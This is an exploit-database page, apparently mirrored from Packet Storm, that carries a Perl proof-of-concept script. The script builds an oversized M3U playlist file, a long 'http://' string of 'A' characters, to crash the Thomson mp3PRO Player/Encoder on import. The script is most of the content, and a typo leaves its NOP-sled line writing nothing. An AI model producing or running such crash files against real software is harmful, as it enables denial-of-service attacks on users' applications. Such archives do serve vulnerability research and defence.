Lucene search
K

Thomson mp3PRO Denial Of Service

🗓️ 29 Jan 2009 00:00:00Reported by HakxerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Thomson mp3PRO Player/Encoder Denial Of Service through M3U file impor

Code
`#!/usr/bin/perl  
# Discovered & Written by : Hakxer [ Sec-geeks.com] EgY Coders Team :D  
# program : Thomson mp3PRO Player/Encoder [ M3U File ] Crash PoC  
# what happen .. : when you import hakxer.m3u file into program ....... Get Crashed :D  
# Greetz : EgyptianxHacker , Providor , EgY Coders team , Bin@ry , Sec-geeks.com , Stealth  
# Proud to Be Egyptian & Arabian .....  
#  
# Download : http://www.mp3prozone.com/assets/mp3PROAudioPlayer.exe .. thx  
  
my $SC="\x48\x61\x6B\x78\x65\x72"; # Secret c0de :D  
  
my $c0d3="\x90" x 500000;  
my $fake="http://"."A" x 800000;  
open(MYFILE,'>>hakxer.m3u');  
print MYFILE $fake;  
print MFFILE $c0d3;  
close(MYFILE);  
print "PoC Created .. Hakxer [sec-geeks.com] EgY Coders Team my SC : $SC";  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation